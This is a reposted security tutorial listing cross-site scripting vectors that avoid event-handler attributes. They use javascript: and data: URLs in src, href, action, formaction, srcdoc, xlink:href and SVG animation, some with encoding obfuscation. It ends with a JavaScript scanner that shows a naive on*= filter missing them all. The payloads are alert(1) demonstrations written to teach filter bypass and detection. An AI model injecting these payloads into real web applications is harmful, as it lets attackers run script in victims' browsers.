[XSS Tricks Extended] 24. XSS Without Event Handlers

    Some XSS attacks do not rely on our usual event-handler payload scheme: they are triggered by a local or remote resource call instead, so a filter that only strips on*= attributes does not catch them. What follows is not an exhaustive list, and some entries require UI (user interaction), but all of them are meant to work in the latest Firefox and Chrome as of this writing, except the ones marked with an asterisk (Firefox only).

    Our default JavaScript payload is javascript:alert(1), with a few exceptions. It leaves some room for obfuscation when a filter is in the way, but it can also be replaced by the data URI scheme:

    data:text/html,<script>alert(1)</script>
    or
    data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

    Two caveats when swapping in a data URI: a javascript: URL in src, href or action runs in the origin of the embedding page, whereas a data: document is loaded into an opaque (unique) origin in current Chrome and Firefox, so it pops the alert but cannot read the victim page's DOM or cookies; and both browsers now block top-level navigation to data: URLs, so the data URI form is limited to embedded contexts such as iframe src and object data.

    Because they are useful as alternatives to the event-based ones, let's group them by the attribute that carries the payload and triggers the alert:

    1) (no attribute)

    <script>alert(1)</script>

    2) src

    <script src=javascript:alert(1)>
    <iframe src=javascript:alert(1)>
    <embed src=javascript:alert(1)> *

    3) href

    <a href=javascript:alert(1)>click
    <math><brute href=javascript:alert(1)>click *
    (brute is an arbitrary element name: Firefox honours href on MathML elements, so the element becomes a clickable link)

    4) action

    <form action=javascript:alert(1)><input type=submit>
    <isindex action=javascript:alert(1) type=submit value=click> *

    5) formaction

    <form><button formaction=javascript:alert(1)>click
    <form><input formaction=javascript:alert(1) type=submit value=click>
    <form><input formaction=javascript:alert(1) type=image value=click>
    <form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
    <isindex formaction=javascript:alert(1) type=submit value=click> *
    (An input of type=image is itself a submit button, so the src in the fourth vector only serves as a lure for the click. Both isindex vectors are historical now: the element has since been removed from Firefox and Chrome.)

    6) data

    <object data=javascript:alert(1)> *

    7) srcdoc

    <iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
    (Shown URL-encoded for delivery in a query string. Once decoded, the srcdoc value is &lt;svg/o&#x6Eload&equals;alert&lpar;1)&gt;, and because srcdoc is an attribute the browser resolves those character references before parsing the value as a document, yielding <svg/onload=alert(1)>. The event handler therefore lives inside the srcdoc document, where a filter applied to the outer markup never sees it.)

    8) xlink:href

    <svg><script xlink:href=data:,alert(1)></script>
    <svg><script xlink:href=data:,alert(1) /> *
    <math><brute xlink:href=javascript:alert(1)>click *
    (data:,alert(1) is a data URL with the default text/plain type whose body is the script; the SVG script element fetches it through xlink:href as its source)

    9) from

    <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
    (The animate element rewrites the enclosing a element's xlink:href to the from value at begin=0, so the link target becomes javascript:alert(1) without the string ever appearing in an href; the r=400 circle gives a large clickable area.)

    Demo: <a href=javascript:alert(1)>, with "javascript" obfuscated and the link styled as a fake YouTube video player.
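    The point of the list above is that a blacklist of on* attributes misses every one of these vectors. The following is an added example, not code from the original post: a small scanner in JavaScript (Node) that flags the constructs above by checking URL-valued attributes for a javascript: or data: scheme after entity decoding, and by re-scanning srcdoc values as documents. It assumes the vectors arrive URL-encoded in a query parameter (hence the single decodeURIComponent on the srcdoc vector), uses only a subset of named character references, and the last two entries in VECTORS (entity and whitespace obfuscation of the scheme) are constructed here rather than taken from the post. A naive event-handler filter and the scanner are run side by side over the same input.

```javascript
'use strict';

// Added example, not code from the original post. A blacklist that only strips on*=
// event handlers misses every vector on this page; a check on URL-valued attributes for a
// javascript:/data: scheme, after entity decoding and with srcdoc values re-scanned as
// documents, reports all of them. Assumes the input is an HTML fragment reflected into a
// page, URL-decoded once as a query parameter would be.

// Subset of named character references; numeric references are decoded generically.
const NAMED_ENTITIES = {
  lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", colon: ':', lpar: '(', rpar: ')',
  equals: '=', sol: '/', comma: ',', Tab: '\t', NewLine: '\n', nbsp: '\u00a0',
};

// Decode &#NN; / &#xHH; / &name; as a browser does for attribute values.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body) ? NAMED_ENTITIES[body] : m;
  });
}

// Attributes the post abuses: each holds a URL the browser navigates to, loads or animates.
const URL_ATTRS = new Set(['src', 'href', 'action', 'formaction', 'data', 'xlink:href', 'from', 'to']);

// Scheme of a URL attribute value after browser-style normalisation: entity decode, drop
// leading C0 controls/space, strip tab/CR/LF anywhere, lower-case.
function urlScheme(value) {
  const v = decodeEntities(value).replace(/^[\x00-\x20]+/, '').replace(/[\t\r\n]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(v);
  return m ? m[1] : null;
}

const TAG_RE = /<([a-z][\w:-]*)((?:[^>"']|"[^"]*"|'[^']*')*)>?/gi;
const ATTR_RE = /([^\s="'\/>]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

// Scan an HTML fragment and return one finding per dangerous construct. Attribute names are
// deliberately not entity-decoded (browsers do not decode them either); attribute values are.
// A srcdoc value is decoded and scanned again as a document, which is where the post's
// srcdoc vector turns into a plain onload= handler.
function findXssVectors(html, depth = 0) {
  const findings = [];
  for (const tag of html.matchAll(TAG_RE)) {
    const name = tag[1].toLowerCase();
    if (name === 'script') findings.push({ tag: name, attr: null, reason: 'script element' });
    for (const a of tag[2].matchAll(ATTR_RE)) {
      const attr = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (/^on[a-z]+$/.test(attr)) {
        findings.push({ tag: name, attr, reason: 'event handler' });
      } else if (attr === 'srcdoc' && depth < 3) {
        for (const f of findXssVectors(decodeEntities(value), depth + 1)) {
          findings.push({ ...f, reason: 'via srcdoc: ' + f.reason });
        }
      } else if (URL_ATTRS.has(attr)) {
        const scheme = urlScheme(value);
        if (scheme === 'javascript' || scheme === 'data') {
          findings.push({ tag: name, attr, reason: scheme + ': URL' });
        }
      }
    }
  }
  return findings;
}

// The filter the post is written against: reject only on*= event handlers.
function naiveEventHandlerFilter(html) {
  return /\bon[a-z]+\s*=/i.test(html);
}

// Vectors taken from the post (URL-decoded once). The last two are constructed here to show
// entity and whitespace obfuscation of the scheme; they are not from the post.
const VECTORS = [
  '<script>alert(1)</script>',
  '<iframe src=javascript:alert(1)>',
  '<a href=javascript:alert(1)>click',
  '<form action=javascript:alert(1)><input type=submit>',
  '<form><button formaction=javascript:alert(1)>click',
  '<object data=javascript:alert(1)>',
  decodeURIComponent('<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>'),
  '<svg><script xlink:href=data:,alert(1)></script>',
  '<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>',
  '<a href="java&Tab;script:alert(1)">click',
  '<a href="&#106;avascript:alert(1)">click',
];

// Run both checks over every vector; returns the comparison rather than only printing it.
function demo(vectors = VECTORS) {
  return vectors.map((vector) => ({
    vector,
    naiveBlocks: naiveEventHandlerFilter(vector),
    findings: findXssVectors(vector),
  }));
}

for (const r of demo()) {
  const hits = r.findings.map((f) => `${f.tag}[${f.attr ?? '-'}] ${f.reason}`).join('; ');
  console.log(`naive=${r.naiveBlocks} scanner=${hits || 'none'}  ${r.vector}`);
}
```

    Run it with node: every vector passes the naive filter (naive=false) and is reported by findXssVectors. The scanner is deliberately conservative (it flags any javascript: href, harmless or not), which is the right bias for a detector, but it is not a sanitizer; output encoding for the actual HTML, attribute and URL context is what prevents these vectors, not a regex.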

    If you know any other vector, please let me know in comments and I will update this list.

    #hack2learn

Original article: https://www.cnblogs.com/devi1/p/13486391.html